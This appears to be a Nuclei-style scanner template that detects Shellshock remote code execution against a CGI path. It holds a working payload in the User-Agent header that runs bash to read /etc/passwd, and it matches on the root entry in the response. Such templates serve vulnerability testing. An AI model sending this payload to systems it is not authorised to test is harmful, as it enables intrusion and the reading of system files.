id: rce-user-agent-shell-shock info: name: Remote Code Execution Via (User-Agent) author: 0xelkomy severity: high tags: shellshock,rce requests: - method: GET path: - "{{BaseURL}}/cgi-bin/status" headers: User-Agent: "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'" matchers: - type: regex regex: - "root:.*:0:0" part: body